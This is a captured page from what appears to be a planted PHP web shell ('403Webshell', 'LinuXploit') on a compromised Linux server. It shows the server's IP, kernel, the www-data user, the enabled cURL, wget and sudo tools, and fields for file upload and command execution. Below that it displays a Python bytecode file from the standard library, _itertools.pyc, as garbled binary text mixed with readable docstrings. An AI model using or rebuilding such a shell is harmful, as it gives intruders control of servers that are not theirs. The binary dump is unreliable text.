403Webshell
Server IP : 178.105.222.151  /  Your IP : 216.73.216.38
Web Server : nginx/1.28.3
System : Linux MNK 7.0.0-15-generic #15-Ubuntu SMP PREEMPT_DYNAMIC Wed Apr 22 16:06:43 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.5.4
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /usr/lib/python3.14/importlib/metadata/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/lib/python3.14/importlib/metadata/__pycache__/_itertools.cpython-314.pyc
+
��3j��,�^RIHtRRlt]]33RltR#)�)�filterfalseNc#��"�\4pVPpVf,\VPV4FpV!V4Vx�K	R#VFpV!V4pWR9gKV!V4Vx�K!	R#5i)zHList unique elements, preserving order. Remember all elements ever seen.N)�set�addr�__contains__)�iterable�key�seen�seen_add�element�ks&&    �4/usr/lib/python3.14/importlib/metadata/_itertools.py�unique_everseenrsg����5�D��x�x�H�
�{�"�4�#4�#4�h�?�G��W���M�@� �G��G��A��}�����
�	 �s�AA/�A/c��Vf\R4#Ve\W4'd
\V34#\V4# \d\T34u#i;i)aIf *obj* is iterable, return an iterator over its items::

    >>> obj = (1, 2, 3)
    >>> list(always_iterable(obj))
    [1, 2, 3]

If *obj* is not iterable, return a one-item iterable containing *obj*::

    >>> obj = 1
    >>> list(always_iterable(obj))
    [1]

If *obj* is ``None``, return an empty iterable:

    >>> obj = None
    >>> list(always_iterable(None))
    []

By default, binary and text strings are not considered iterable::

    >>> obj = 'foo'
    >>> list(always_iterable(obj))
    ['foo']

If *base_type* is set, objects for which ``isinstance(obj, base_type)``
returns ``True`` won't be considered iterable.

    >>> obj = {'a': 1}
    >>> list(always_iterable(obj))  # Iterate over the dict's keys
    ['a']
    >>> list(always_iterable(obj, base_type=dict))  # Treat dicts as a unit
    [{'a': 1}]

Set *base_type* to ``None`` to avoid any special handling and treat objects
Python considers iterable as iterable:

    >>> obj = 'foo'
    >>> list(always_iterable(obj, base_type=None))
    ['f', 'o', 'o']
�)�iter�
isinstance�	TypeError)�obj�	base_types&&r�always_iterablersY��R�{��B�x����:�c�#=�#=��S�F�|����C�y������S�F�|���s�
=�A�A)N)�	itertoolsrr�str�bytesrr�r�<module>rs��!��&%(��<�2r

Youez - 2016 - github.com/yon3zu
LinuXploit